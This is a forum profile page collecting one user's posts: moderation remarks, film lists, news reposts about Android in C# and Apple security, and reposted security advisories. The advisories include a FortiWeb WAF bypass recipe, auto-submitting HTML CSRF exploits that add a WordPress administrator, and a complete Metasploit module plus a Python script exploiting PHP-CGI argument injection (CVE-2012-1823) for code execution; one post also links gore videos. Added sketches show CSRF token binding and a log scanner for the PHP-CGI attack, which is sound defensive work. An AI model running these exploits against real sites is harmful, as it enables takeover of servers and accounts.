Everything posted by Nytro
-
It's probably not for you.
-
User unu_1234567 has had his V.I.P. rank removed because he took advantage of it to gain trust. He will not be banned, under any circumstances, because of his contributions; those who have been here a long time will understand. We hope it does not happen again. It is up to you to decide the moral "winner" of the dispute and whether you will get involved in trades with them, but keep in mind that both are people who deserve respect, although many of you probably know nothing about them.
-
They are not fake, young man; in Africa women are still burned at the stake for witchcraft, reality is harsh. In Tibet nuns set themselves on fire: Self Immolation Video of Buddhist Nun Palden Choetso in Tibet | Best Gore, Self Immolation of a Nun in Tibet | Best Gore. Then, in the middle of "civilization": http://www.bestgore.com/execution/african-man-lynched-burned-alive-gay-necklacing-failed/
-
GET and POST requests using the RollingCurl library
Nytro replied to konkhra's topic in Programare
Pff, I don't like how the library is built; I don't think the example http://rolling-curl.googlecode.com/svn/trunk/example_groups.php helps you. Use plain curl, with curl_multi_exec.
Adobe Photoshop CS5.1 U3D.8BI Collada Asset Elements Stack Overflow
Nytro replied to The_Arhitect's topic in Exploituri
Photoshop CS5 (12.04, I think) crashes, but the shellcode does not execute. Does anyone have CS5.1 to try it on?
Friends know why.
-
They are both good guys (from other points of view); we will see tonight what is to be done.
-
PHP-CGI Exploitation by Example - SpiderLabs Anterior
-
[h=1]Download BitDefender Total Security 2013 Beta – Testing has begun[/h]
By Radu FaraVirusi(com) on May 7, 2012

BitDefender announces the launch of BitDefender Total Security 2013 Beta, which can be evaluated free of charge for 60 days.

What's new?
- Device Anti-Theft
- USB Immunizer
- Windows Widget
- improvements to Parental Control, BitDefender SafeBox, MyBitDefender Dashboard

To download BitDefender Total Security 2013 Beta, go to: Bitdefender Total Security 2013 BETA

Source: Download BitDefender Total Security 2013 Beta – Testing has begun
-
[h=1]Fortinet FortiWeb Web Application Firewall Policy Bypass[/h]
BINAR10 Report on Fortinet Fortiweb Findings
02/05/2012
- Fortinet FortiWeb Web Application Firewall Policy Bypass -
============================================================

1) Affected Product

Manufacturer: Fortinet
Product name: FortiWeb
Version: Latest update to Tue, 2 May 2012
Type: Web Application Firewall
Product URL: http://www.fortinet.com/products/fortiweb/index.html

2) Description of the Findings

BINAR10 has found a policy bypass occurrence when large size data is sent in POST (data) or GET request.

3) Technical Details

3.1. POST Request Example

When any padding data that surpasses 2399 bytes is appended to a POST request, the WAF does not inspect the data sent and the request hits the application directly. This should occur when the product is not configured to block malformed requests, but this feature also checks the POST size limit, blocking the request if it surpasses a fixed limit; therefore it is likely that it is being disabled due to application requirements in medium-size forms. The response is also not verified by the WAF, and information disclosure occurs with details of the infrastructure.

This bypass could be used to inject different types of vectors; as shown in the example, it is only necessary to append a new variable at the end of the POST data, filled with arbitrary data that exceeds 2399 bytes.

---POST example

POST /<path>/login-app.aspx HTTP/1.1
Host: <host>
User-Agent: <any valid user agent string>
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: <the content length must be at least 2399 bytes>

var1=datavar1&var2=datavar12&pad=<random data to complete at least 2399 bytes>

3.2. GET Requests

The same issue as with the POST request, but it could be done by sending arbitrary data at the end of the URL.

--GET example

http://<domain>/path?var1=vardata1&var2=vardata2&pad=<large arbitrary data>

4. Validation Required

It requires the validation of other researchers who have access to the product.

5. Time Table

04/27/2012 - Vendor notified.
04/27/2012 - Vendor response, requiring some tests.
05/02/2012 - Vendor indicates that this is a configuration problem and not a product vulnerability.

6. Credits

Geffrey Velasquez <geffrey at gmail.com> at BINAR10 S.A.C.

Source: Fortinet FortiWeb Web Application Firewall Policy Bypass
-
- The Curious Case of Benjamin Button
- Sherlock Holmes
- Ring of the Nibelungs
- The Illusionist
- The Librarian
- Butterfly Effect
- Dark Floors
- Room 1408
- The Cube
- The Eye
- Triangle

Not necessarily psychological, but worth watching.
-
I moved it there (from Announcements + warn); I didn't know where else to put it. Calm down.
-
Have you looked here: oberhumer.com: LZO real-time data compression library?
-
[h=1]Wordpress 3.3.1 Multiple CSRF Vulnerabilities[/h]
+---------------------------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : Wordpress 3.3.1 Multiple CSRF Vulnerabilities
# Date : 19-03-2012
# Author : Ivano Binetti (http://www.ivanobinetti.com)
# Software link : http://wordpress.org/wordpress-3.3.1.zip
# Vendor site : http://wordpress.org
# Version : 3.3.1 (and lower). Probably also version 3.3.2 is affected.
# Tested on : Debian Squeeze (6.0)
# Original Advisory : http://www.webapp-security.com/2012/04/wordpress-3-3-1-multiple-csrf-vulnerabilities/
# CVE : CVE-2012-1936
# OSVDB ID : 81588
# Bugtraq ID : 53280
+---------------------------------------------------------------------------------------------------------------------------------------------------+
Summary
1)Introduction
2)Vulnerabilities Description
  2.1 Multiple CSRF
3)Exploit
  3.1 CSRF (Change Post Title)
  3.2 CSRF (Add Admin)
+---------------------------------------------------------------------------------------------------------------------------------------------------+

1)Introduction

WordPress "is web software you can use to create a beautiful website or blog. We like to say that WordPress is both free and priceless at the same time."

2)Vulnerability Description

2.1 Multiple CSRF

Wordpress 3.3.1 suffers from multiple CSRF vulnerabilities which allow an attacker to change post title, add administrators/users, delete administrators/users, approve and unapprove comment, delete comment, change background image, insert custom header image, change site title, change administrator's email, change Wordpress Address, change Site Address, when an authenticated user/admin browses a specially crafted web page. Maybe other parameters can be modified.

This vulnerability is caused by a security flaw in anti-CSRF token (_wpnonce, _wpnonce_create-user, _ajax_nonce, _wpnonce-custom-background-upload, _wpnonce-custom-header-upload) generation. For some operations (see below) the above specified anti-CSRF tokens are not associated with the current user session (as Owasp recommends) but are valid for all operations (for a specific administrator/user) within 12 hours. The above described vulnerability allows an attacker - who has sniffed an anti-CSRF token - to have 12 hours to perform a CSRF attack.

For the Owasp recommendation about anti-CSRF tokens, you can read the following document:
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29_Prevention_Cheat_Sheet#General_Recommendation:_Synchronizer_Token_Pattern

This problem affects the following operations:
- Add Admin/User
- Delete Admin/User
- Approve comment
- Unapprove comment
- Delete comment
- Change background image
- Insert custom header image
- Change site title
- Change administrator's email
- Change Wordpress Address
- Change Site Address

Other operations (like inserting a new post) are not affected by this CSRF vulnerability.

In this Advisory I will only demonstrate how to change post title and how to add a new administrator account.

3)Exploit

3.1 CSRF (Change Post Title)

<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to change post title</H2>
<form method="POST" name="form0" action="http://<wordpress_ip>:80/wp-admin/admin-ajax.php">
<input type="hidden" name="post_title" value="hackedtitle"/>
<input type="hidden" name="post_name" value="hackedtitle"/>
<input type="hidden" name="mm" value="03"/>
<input type="hidden" name="jj" value="16"/>
<input type="hidden" name="aa" value="2012"/>
<input type="hidden" name="hh" value=""/>
<input type="hidden" name="mn" value=""/>
<input type="hidden" name="ss" value=""/>
<input type="hidden" name="post_author" value="1"/>
<input type="hidden" name="post_password" value=""/>
<input type="hidden" name="post_category%5B%5D" value="0"/>
<input type="hidden" name="post_category%5B%5D" value="1"/>
<input type="hidden" name="tax_input%5Bpost_tag%5D" value=""/>
<input type="hidden" name="comment_status" value="open"/>
<input type="hidden" name="ping_status" value="open"/>
<input type="hidden" name="_status" value="publish"/>
<input type="hidden" name="post_format" value="0"/>
<input type="hidden" name="_inline_edit" value="<sniffed_value>"/>
<input type="hidden" name="post_view" value="list"/>
<input type="hidden" name="screen" value="edit-post"/>
<input type="hidden" name="action" value="inline-save"/>
<input type="hidden" name="post_type" value="post"/>
<input type="hidden" name="post_ID" value="1"/>
<input type="hidden" name="edit_date" value="true"/>
<input type="hidden" name="post_status" value="all"/>
</form>
</body>
</html>

Note: this exploit simulates changing the post title using the "Quick Edit" function.

3.2 CSRF (Add Admin)

<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to add Administrator</H2>
<form method="POST" name="form0" action="http://<wordpress_ip>:80/wp-admin/user-new.php">
<input type="hidden" name="action" value="createuser"/>
<input type="hidden" name="_wpnonce_create-user" value="<sniffed_value>"/>
<input type="hidden" name="_wp_http_referer" value="%2Fwordpress%2Fwp-admin%2Fuser-new.php"/>
<input type="hidden" name="user_login" value="admin2"/>
<input type="hidden" name="email" value="admin2@admin.com"/>
<input type="hidden" name="first_name" value="admin2@admin.com"/>
<input type="hidden" name="last_name" value=""/>
<input type="hidden" name="url" value=""/>
<input type="hidden" name="pass1" value="password"/>
<input type="hidden" name="pass2" value="password"/>
<input type="hidden" name="role" value="administrator"/>
<input type="hidden" name="createuser" value="Add+New+User+"/>
</form>
</body>
</html>
+--------------------------------------------------------------------------------------------------------------------------------------------------+

Source: Wordpress 3.3.1 Multiple CSRF Vulnerabilities
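
An added sketch of the token-binding issue the advisory describes (not WordPress code and not part of the original advisory or post): a token computed only from user, action and a 12-hour tick still verifies after the user has started a new session, while a token that also covers the session identifier does not. Function names, the secret, session IDs and timestamps are constructed for illustration.

```python
import hashlib
import hmac
import json

WINDOW = 12 * 3600  # 12-hour validity period named in the advisory


def _mac(secret, fields):
    # JSON-encode the fields so that field boundaries are unambiguous.
    msg = json.dumps(fields, separators=(",", ":")).encode()
    return hmac.new(secret, msg, hashlib.sha256).hexdigest()


def issue_user_bound(secret, user_id, action, now):
    """Weak form: the token depends only on user, action and the time tick."""
    return _mac(secret, [user_id, action, now // WINDOW])


def verify_user_bound(secret, token, user_id, action, now):
    expected = issue_user_bound(secret, user_id, action, now)
    return hmac.compare_digest(token, expected)


def issue_session_bound(secret, session_id, user_id, action, now):
    """Synchronizer-token style: the current session is part of the MAC input."""
    return _mac(secret, [session_id, user_id, action, now // WINDOW])


def verify_session_bound(secret, token, session_id, user_id, action, now):
    expected = issue_session_bound(secret, session_id, user_id, action, now)
    return hmac.compare_digest(token, expected)


def relogin_scenario():
    """A token is issued in one session, then checked after a fresh login."""
    secret = b"constructed-demo-secret"       # hypothetical server-side key
    user_id, action = 1, "create-user"        # hypothetical admin and action
    old_session, new_session = "sess-A", "sess-B"

    t_issue = 1_000_000                       # constructed timestamp (seconds)
    t_relogin = t_issue + 3600                # one hour later, same 12-hour tick
    t_expired = t_issue + WINDOW              # next tick

    weak = issue_user_bound(secret, user_id, action, t_issue)
    strong = issue_session_bound(secret, old_session, user_id, action, t_issue)

    return {
        # The old token is still accepted although the session changed.
        "weak_after_relogin": verify_user_bound(
            secret, weak, user_id, action, t_relogin),
        # The session-bound token is rejected in the new session...
        "strong_after_relogin": verify_session_bound(
            secret, strong, new_session, user_id, action, t_relogin),
        # ...but keeps working inside the session it was issued for.
        "strong_same_session": verify_session_bound(
            secret, strong, old_session, user_id, action, t_relogin),
        # Only the clock ends the life of the user-bound token.
        "weak_after_window": verify_user_bound(
            secret, weak, user_id, action, t_expired),
    }


if __name__ == "__main__":
    for name, accepted in relogin_scenario().items():
        print(f"{name}: {'accepted' if accepted else 'rejected'}")
```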
-
[h=1]PHP CGI Argument Injection[/h]
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'PHP CGI Argument Injection',
      'Description' => %q{
        When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to
        an argument injection vulnerability. This module takes advantage of
        the -d flag to set php.ini directives to achieve code execution.

        From the advisory: "if there is NO unescaped '=' in the query string,
        the string is split on '+' (encoded space) characters, urldecoded,
        passed to a function that escapes shell metacharacters (the "encoded in
        a system-defined manner" from the RFC) and then passes them to the CGI
        binary."
      },
      'Author' => [ 'egypt', 'hdm' ],
      'License' => MSF_LICENSE,
      'Version' => '$Revision$',
      'References' => [
        [ "CVE" , "2012-1823" ],
        [ "URL" , "http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/" ],
      ],
      'Privileged' => false,
      'Payload' => {
        'DisableNops' => true,
        # Arbitrary big number. The payload gets sent as an HTTP
        # response body, so really it's unlimited
        'Space' => 262144, # 256k
      },
      'DisclosureDate' => 'May 03 2012',
      'Platform' => 'php',
      'Arch' => ARCH_PHP,
      'Targets' => [[ 'Automatic', { }]],
      'DefaultTarget' => 0))

    register_options([
      OptString.new('TARGETURI', [false, "The URI to request (must be a CGI-handled PHP script)"]),
    ], self.class)
  end

  # php-cgi -h
  # ...
  # -s Display colour syntax highlighted source.
  def check
    uri = target_uri.path

    uri.gsub!(/\?.*/, "")

    print_status("Checking uri #{uri}")

    response = send_request_raw({ 'uri' => uri })

    if response and response.code == 200 and response.body =~ /\<code\>\<span style.*\&lt\;\?/mi
      print_error("Server responded in a way that was ambiguous, could not determine whether it was vulnerable")
      return Exploit::CheckCode::Unknown
    end

    response = send_request_raw({ 'uri' => uri + '?-s'})
    if response and response.code == 200 and response.body =~ /\<code\>\<span style.*\&lt\;\?/mi
      return Exploit::CheckCode::Vulnerable
    end

    print_error("Server responded indicating it was not vulnerable")
    return Exploit::CheckCode::Safe
  end

  def exploit
    begin
      args = [
        "-d+allow_url_include%3d#{rand_php_ini_true}",
        "-d+safe_mode%3d#{rand_php_ini_false}",
        "-d+suhosin.simulation%3d#{rand_php_ini_true}",
        "-d+disable_functions%3d%22%22",
        "-d+open_basedir%3dnone",
        "-d+auto_prepend_file%3dphp://input",
        "-n"
      ]

      qs = args.join("+")
      uri = "#{target_uri}?#{qs}"

      # Has to be all on one line, so gsub out the comments and the newlines
      payload_oneline = "<?php " + payload.encoded.gsub(/\s*#.*$/, "").gsub("\n", "")
      response = send_request_cgi( {
        'method' => "POST",
        'global' => true,
        'uri' => uri,
        'data' => payload_oneline,
      }, 0.5)
      handler

    rescue ::Interrupt
      raise $!
    rescue ::Rex::HostUnreachable, ::Rex::ConnectionRefused
      print_error("The target service unreachable")
    rescue ::OpenSSL::SSL::SSLError
      print_error("The target failed to negotiate SSL, is this really an SSL service?")
    end
  end

  def rand_php_ini_false
    Rex::Text.to_rand_case([ "0", "off", "false" ][rand(3)])
  end

  def rand_php_ini_true
    Rex::Text.to_rand_case([ "1", "on", "true" ][rand(3)])
  end

end

[h=1]PHP CGI Argument Injection Exploit[/h]
######################################################################################
# Exploit Title: Cve-2012-1823 PHP CGI Argument Injection Exploit
# Date: May 4, 2012
# Author: rayh4c[0x40]80sec[0x2e]com
# Exploit Discovered by wofeiwo[0x40]80sec[0x2e]com
######################################################################################

import socket
import sys

def cgi_exploit():
    pwn_code = """<?php phpinfo();?>"""
    post_Length = len(pwn_code)
    http_raw="""POST /?-dallow_url_include%%3don+-dauto_prepend_file%%3dphp://input HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded
Content-Length: %s

%s
""" %(HOST , post_Length ,pwn_code)
    print http_raw
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((HOST, int(PORT)))
        sock.send(http_raw)
        data = sock.recv(10000)
        print repr(data)
        sock.close()
    except socket.error, msg:
        sys.stderr.write("[ERROR] %s\n" % msg[1])
        sys.exit(1)

if __name__ == '__main__':
    try:
        HOST = sys.argv[1]
        PORT = sys.argv[2]
        cgi_exploit()
    except IndexError:
        print '[+]Usage: cgi_test.py site.com 80'
        sys.exit(-1)

Sources:
- PHP CGI Argument Injection
- PHP CGI Argument Injection Exploit
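
A detection-side companion to the rule quoted from the advisory above, added here as an example (it is not part of the Metasploit module, the 80sec script or the original post): it applies the "no unescaped '=' means split on '+' and urldecode" rule to the request targets in a web access log and reports query strings that would reach php-cgi as command-line switches. The log lines are constructed, and the function names and the combined-log regex are assumptions of this example.

```python
import re
from urllib.parse import unquote

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')

# Constructed sample log using documentation addresses, not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [04/May/2012:10:01:02 +0000] "GET /index.php?id=5 HTTP/1.1" 200 512
198.51.100.7 - - [04/May/2012:10:01:05 +0000] "GET /index.php?-s HTTP/1.1" 200 2048
198.51.100.9 - - [04/May/2012:10:02:11 +0000] "POST /?-dallow_url_include%3don+-dauto_prepend_file%3dphp://input HTTP/1.1" 200 90211
198.51.100.9 - - [04/May/2012:10:02:40 +0000] "GET /search.php?q=php+-s HTTP/1.1" 200 733
198.51.100.3 - - [04/May/2012:10:03:00 +0000] "GET /index.php?about+us HTTP/1.1" 200 640
198.51.100.3 - - [04/May/2012:10:03:09 +0000] "GET /index.php?%2ds HTTP/1.1" 200 2050
198.51.100.4 - - [04/May/2012:10:04:30 +0000] "POST /index.php?-d+allow_url_include%3dOn+-d+auto_prepend_file%3dphp://input+-n HTTP/1.1" 200 120
"""


def cgi_argv(query):
    """Arguments the CGI layer would pass to php-cgi, per the quoted rule.

    A literal (unescaped) '=' anywhere in the query string means it is
    treated as form data and nothing reaches the command line.
    """
    if not query or "=" in query:
        return []
    return [unquote(part) for part in query.split("+") if part]


def injected_switches(target):
    """Return the decoded arguments of a request target that look like switches."""
    query = target.partition("?")[2].partition("#")[0]
    return [arg for arg in cgi_argv(query) if arg.startswith("-")]


def classify(switches):
    """Coarse label based on the two switches the page discusses (-d and -s)."""
    if any(s.startswith("-d") for s in switches):
        return "ini-override"          # -d sets php.ini directives
    if "-s" in switches:
        return "source-disclosure"     # -s prints highlighted source
    return "other-switch"


def scan_access_log(text):
    """Return (line_number, label, switches) for every suspicious request."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        switches = injected_switches(match.group("target"))
        if switches:
            findings.append((lineno, classify(switches), switches))
    return findings


if __name__ == "__main__":
    for lineno, label, switches in scan_access_log(SAMPLE_LOG):
        print(f"line {lineno}: {label}: {switches}")
```

The `q=php+-s` and `about+us` requests are not reported: the first contains a literal '=', the second yields arguments but no switch.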
-
Are you in Bucharest? Shall we go for a drink?
-
Zuckerberg's employees get rich from the moment they are hired
Nytro replied to Nytro's topic in Stiri securitate
The trick with big salaries is that most of the time the contracts are signed for long periods, and that is probably the case here too: if he signs for 2-3 years, within 6 months he already knows enough to deserve that salary (well, let's say 1 year), and after that he becomes "profitable" for the company.
[h=2]Android Ported to C#[/h]

Oracle and Google are currently in a $1 billion wrestling match over Google’s use of Java in Android. But Java is not the only way to build native apps on Android. In fact, it’s not even the best way: we have been offering C# to Android developers as a high-performance, low-battery consuming alternative to Java. Our platform, Mono, is an open source implementation of the .NET framework that allows developers to write their code using C# while running on top of the Java-powered operating system, and then share that same code with iOS and Windows Phone.

Unlike Sun with Java, Microsoft submitted C# and the .NET VM for standardization to ECMA and saw those standards graduated all the way to ISO strong patent commitments. The .NET framework is also covered by Microsoft’s legally binding community promise.

Last July when Xamarin was getting started, we got our team together in Boston to plan the evolution of Mono on iOS and Android. After a day of kayaking in the Charles River, we sat down to dinner and turned our attention to how we could improve the performance and battery life of applications on Android, and make our own Mono for Android even better.

[Photo caption: The Xamarin team after a day of Kayaking, back when we were a small company]

Over and over we came back to the basics: Dalvik is a young virtual machine, it is not as performant or tuned as Mono and suffers from many of Java’s performance limitations without the benefit of the high-end optimizations from Oracle’s HotSpot. One crazy idea that the team had at that dinner was to translate Android’s source code to C#. Android would benefit from C# performance features like structures, P/Invoke, real generics and our more mature runtime.

Although nothing happened back in July, this idea stuck in the back of our minds. Fast forward a few months: Mono for Android is doing great, and we are starting to think again about improving our own product’s performance on Android. What if we could swap out Java with faster C# and get rid of various Dalvik limitations in the process? Could we create an Android phone completely free of Java, and free of the limitations of the Dalvik VM?

We decided it was crazy enough to try. So we started a small skunkworks project with the goal of doing a machine translation of Android from Java to C#. We called this project XobotOS.

[h=2]The XobotOS Research Project[/h]

The result of our efforts is that today we have most of Android’s layouts and controls entirely in C#. Here are some screenshots of XobotOS running on a Linux workstation, no Java involved:

Getting to this point required that the majority of the Android Java code be translated from Java to C#, so what you see above represents very significant progress. So how did we do it?

[h=2]Java Translation via Sharpen[/h]

Android’s core codebase contains over a million lines of Java code, and we knew we wanted to be able to stay up to date with new releases of Android — in fact, we started with the Android 2.x source code back in 2011, and then upgraded XobotOS to Android 4.0 when Google open sourced Ice Cream Sandwich earlier this year. So for us, the only reasonable option was to do a machine translation of Java to C#, building and maintaining any necessary tools along the way.

The tool we used as a starting point is called Sharpen. Sharpen is famous for helping people such as Frank Krueger port a Java applet to an award-winning iPad app in two months. We matured Sharpen a lot, and the result is a much-improved Java-to-C# translation tool for everyone. We are releasing this new version of Sharpen today along with the code for XobotOS and we hope that many more people will benefit from it and contribute to it.

[h=2]Performance[/h]

So once you have Android running on Mono, the obvious question is — how does Mono perform compared to Dalvik?

When C# came around, Microsoft modified the language in a couple of significant ways that made it easier to optimize. Value types were introduced to allow small objects to have low overheads and virtual methods were made opt-in, instead of opt-out which made for simpler VMs.

Later on, Java and C# diverged in the way that they implemented generics. Java went with a full-backwards compatibility approach, while C# baked the support into the runtime. The C# approach led to a simple-to-use, simple-to-understand generics setup as well as being much more performant and complete.

Since then, both the language and the execution environment have continued to evolve and improve. C# went from being a slightly better Java to be light-years ahead. From embracing dynamic programming, bring asynchronicity into the language, introduce iterators, functional programming constructs, embrace parallelism and got a great implementation of generics. Many of these features came from the research done by Don Syme and his F# team that have kept a steady flow of new ideas getting injected into the language.

Furthermore, Mono as a virtual machine has matured substantially in the last 10 years and is now considered to be on its 8th generation.

All of this adds up. You can see the massive difference in the performance of structs and generics in this benchmark we ran of a simple binary tree implementation in Java and C#:

[h=2]What’s Next[/h]

Today we’re proud to announce that we’ve made XobotOS available on github so that you can try it out yourself. Our goal as a company is to provide the best platform for building mobile apps, and so XobotOS will not be a focus for us going forward. But it was a fun experiment to run, and as it turns out, a few technologies have come out of the effort that we’ll be able to include in future versions of our products:

- Direct Graphics Access to Skia: Currently Mono for Android accesses the underlying graphics libraries through Java, with the code that we built for XobotOS, we will skip the middleman and use Mono’s P/Invoke to get straight to the native rendering code in Skia.
- Java to C# tooling: Our new version of Sharpen is available as part of our XobotOS release.
- Replacing Java code with C# code: we now have the tools necessary to replace some chunks of Java code with C# code where performance is critical and when C# can offer better solutions than Java has.

Our plan is to take elements of the research project and integrate those into our products. A project that we started because we thought it would be fun to do has turned out to yield some serious benefits for our products. It’s important for a startup to stay focused, but sometimes you have to try something crazy to make progress. And who knows, maybe Google will thank us some day.

Xamarin is hiring for many positions to advance the state of the art in mobile development.

Source: Android Ported to C# – Xamarin
-
Regarding Microsoft Windows, for those who are skeptical about the security of Windows systems...

Windows Firewall:
Group policy editor:
File permissions:

And many others. Windows is not exactly "inept" when it comes to security; in fact, in my opinion it does best in this area, and Linux and other operating systems still have a long way to go to reach its level. The problem is simple: "the users". How many will bother to configure firewall rules or put restrictions on folders? Nobody. That is why I expect nobody to complain. Windows has the means, but nobody to use them. So Microsoft has every right to make fun of Apple.
-
- Updated: Yet Another Hotmail, AOL and Yahoo Password Reset 0Day Vulnerabilities
- Exploit writing: A basic Idea.
- Subterfuge - Man-in-the-Middle Attack Framework Tutorial
- Zuckerberg's employees get rich from the moment they are hired
- Ms12-027 Mscomctl Activex Buffer Overflow Metasploit Demo(Ipv6)
- Arbitrary File Upload And Bypassing Protections(Dvwa)
- Dos Attack On Win8 With Hping3 (Packet Flooding)
- Spoofing Dns With Nmap Fast Track Script
- Social Engineer-Toolkit And Windows Credentials Editor
- Microsoft Windows Eot Font Table Directory Integer Overflow.
- Athcon 2010 Mobile Privacy: Tor On The Iphone And Other Unusual Devices
- Athcon 2010 "The Dhcp Recession: Extended Dhcp Exhausting Attack"
- Athcon 2011 Exploiting Anti-Reversing Techniques
- Athcon 2011 Win32 Exploit Development With Pvefindaddr + Project Quebec
- Arp/Dns Spoofing Steal Facebook Password (Lan Environment)
- Privilege Escalation via "Sticky" Keys
- Oracle discloses new zero day exploit and launches JDK for OS X
- SyScan 2012 Singapore slides
- Windows 8 Forensic Guide
- An interesting case of Mac OSX malware
- Targeting ZeroAccess Rootkit’s Achilles’ Heel
- Facebook source code hacker explains,what really happened !
- Bitdefender USB Immunizer

Facebook: https://www.facebook.com/rstforum
-
[h=1]How far behind is Apple's security?[/h]
Paul Wagenseil, SecurityNewsDaily Managing Editor

Kaspersky Lab founder Eugene Kaspersky made headlines last week when he declared that Apple was "10 years behind Microsoft in terms of security."

Kaspersky was referring to the recent spread of the Flashback family of malware, which was greatly aided by Apple's long delay in patching a known software flaw.

But is Apple really 10 years behind the times?

"I'd say that Apple's got another 10 years to go before their security will become as much of a laughingstock as Microsoft's," said Jonathan Zdziarski, author of "Hacking and Securing iOS Applications" (O'Reilly, 2012) and a forensic scientist who hacks into iPhones for Chicago-based viaForensics.

"Comparing Apple and Microsoft is like comparing apples and oranges," said Mikko Hypponen, chief security officer of Finnish anti-virus firm F-Secure.

(Msnbc.com is a joint venture of Microsoft and NBCUniversal.)

Trustworthy computing

Kaspersky's choice of 10 years as the time frame was not random. In January 2002, then-Microsoft chairman Bill Gates issued his famous "Trustworthy Computing" memo to all company personnel. He wrote it shortly after the release of Windows XP, when the brand-new platform was under constant attack by virus writers and hackers.

"Every week there are reports of newly discovered security problems in all kinds of software, from individual applications and services to Windows, Linux, Unix and other platforms," Gates wrote in the memo. "Our responsiveness has been unmatched — but as an industry leader we can and must do better. ... Eventually, our software should be so fundamentally secure that customers never even worry about it."

Gates' memo inaugurated a companywide focus on security, an aspect that had been neglected for the first two decades of Microsoft's existence.

Ten years later, Windows 7 users still need to worry about malware, but Microsoft's current platform is tremendously much stronger and more secure than Windows XP. (Even today, XP, not Windows 7, gets the most malware attacks.)

"Microsoft has improved their security massively since 2002," Hypponen said. "Today, they are [a] model for good security process in many ways."

Microsoft got to that point by essentially outsourcing Windows security. The entire anti-virus industry, with sales of several billion dollars per year, is built on defeating malware that targets Windows.

The existence of that industry frees up Microsoft to work on patching its Windows, which it does extensively every month. Microsoft's open model lets major Windows software makers such as Adobe or Oracle do the same without Microsoft's approval.

Go your own way

Apple, on the other hand, disdains third-party anti-virus software for Macs — though it does exist — and insists on patching certain pieces of third-party software itself.

The Flashback software flaw, discovered in January, was patched for Windows in three weeks. It wasn't patched for Macs until after nearly three months — and after an estimated 600,000 Macs worldwide had been infected.

"Apple needs to learn the meaning of transparency," Zdziarski said. "They need to communicate with their user base and with the security community. They need to be quicker to respond to threats."

He pointed out that Apple's closed-lipped attitude also applies to iOS, the software that runs the iPhone, iPad and iPod Touch.

"Some iOS attacks from the past took months to fix," Zdziarski said. "The [iPhone] jailbreak community had fixes out for users before Apple did. That's shameful."

Qualified kudos

Despite the secrecy, and despite the lack of attacks on Mac OS X, Apple has for many years incorporated the latest security innovations into its operating systems.

"Apple might have some sort of an attitude problem, which shows in their slow patch cycles and so [on]," Hypponen said. "But otherwise, it's hard to critique them with all they've done with OS X: app sandboxing, memory randomization, NX [non-executable memory] support, [the] App Store model."

When the iPhone was introduced, Apple was starting from scratch on a brand-new operating system. It took the opportunity to bake advanced security features into iOS from the very beginning.

"[The] iPhone (or actually, iOS) is a massive security success," Hypponen said. "iOS is now 5 years old and we still haven't seen a single malware attack against it."

Zdziarski wasn't sure how long that blissful interlude would last.

"With Objective-C applications now on over 100 million-plus devices, the threat is very real," he said, referring to the programming language used to create Mac OS X and iOS software.

"It's only a matter of time before a serious worm hijacks tens of millions of devices and thousands of App Store apps at once, and similar on the desktop," Zdziarski said. "Flashback seemed small potatoes; more of a warning that Apple runs the risk of screwing up as big as Microsoft in letting poor design lead to widespread attacks."

Source: How far behind is Apple's security? - Technolog on msnbc.com